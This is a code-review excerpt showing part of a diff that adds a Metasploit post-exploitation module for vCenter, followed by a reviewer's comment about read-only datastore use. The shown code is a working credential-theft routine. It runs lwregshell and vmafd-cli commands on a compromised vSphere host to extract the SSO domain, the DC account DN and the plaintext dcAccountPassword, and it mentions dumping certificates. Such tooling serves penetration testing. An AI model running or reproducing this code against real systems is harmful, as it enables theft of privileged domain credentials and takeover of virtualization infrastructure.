modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,432 @@
+      return
+    end
+
+    print_status('Extracting certificates from vSphere platform ...')
+    unless vmafd_dump
+      print_error('Unable to dump vmafd')
+      return
+    end
+  end
+
+  def vmdir_init
+    if !command_exists?('/usr/lib/vmware-vmafd/bin/vmafd-cli') && !command_exists?('/opt/likewise/bin/lwregshell')
+      print_error('Host does not appear to be a vSphere Platform Services Controller')
+      return false
+    end
+
+    vsphere_machine_id = cmd_exec('/usr/lib/vmware-vmafd/bin/vmafd-cli get-machine-id --server-name localhost')
+    unless validate_uuid(vsphere_machine_id)
+      print_error('Invalid vSphere PSC Machine UUID returned from vmafd-cli!')
+      return false
+    end
+
+    vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
+
+    vsphere_machine_hostname = cmd_exec('hostname')
+    datastore['VCENTER_FQDN'] = vsphere_machine_hostname
+
+    vsphere_machine_ipv4 = cmd_exec('ifconfig | grep eth0 -A1 | grep "inet addr" | awk -F \':\' \'{print $2}\' | awk -F \' \' \'{print $1}\'')
+
+    unless validate_ipv4(vsphere_machine_ipv4)
+      print_error('Could not determine vCenter eth0 IPv4!')
+      return false
+    end
+
+    datastore['RHOSTS'] = vsphere_machine_ipv4
+
+    vprint_status("vSphere Hostname and IPv4: #{vcenter_fqdn} [#{vsphere_machine_ipv4}]")
+
+    vsphere_domain_name = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmafd\Parameters]\'|grep DomainName|awk \'{print $4}\'|tr -d \'"\'')
+
+    unless validate_fqdn(vsphere_domain_name)
+      print_error('Could not determine vSphere SSO domain name!')
+      return false
+    end
+
+    datastore['BASE_FQDN'] = vsphere_domain_name.to_s.downcase
+    vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
+
+    vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')
+    datastore['BASE_DN'] = vsphere_domain_dn
+    vprint_status("vSphere SSO Domain DN: #{base_dn}")
+
+    print_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+    vsphere_domain_dc_dn = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountDN|awk \'{$1=$2=$3="";print $0}\'|tr -d \'"\'|sed -e \'s/^[ \t]*//\'')
+
+    unless validate_dn(vsphere_domain_dc_dn)
+      print_error('Could not determine vmdir dcAccountDN from lwregshell!')
+      return false
+    end
+
+    datastore['BIND_DN'] = vsphere_domain_dc_dn
+    print_good("vSphere SSO DC DN: #{bind_dn}")
+
+    # The DC machine account credential is stored in plaintext within the registry!
+    vsphere_domain_dc_pw = cmd_exec('printf $(/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountPassword|awk \'{print $4}\'|cut -c2-|rev|cut -c2-|rev)')
+
+    unless vsphere_domain_dc_pw
+      print_error('No dcAccountPassword credential returned from lwregshell query')
+      return false
+    end
+
+    datastore['BIND_PW'] = vsphere_domain_dc_pw
```

Comment:
just a quick note, we treat the datastore as a read-only context, although it technically isn't.

Don't worry about fixing this, i'm going to take most of this meat-and-potatoes stuff and move it to a lib so that other modules will be able to use things in a standardized way.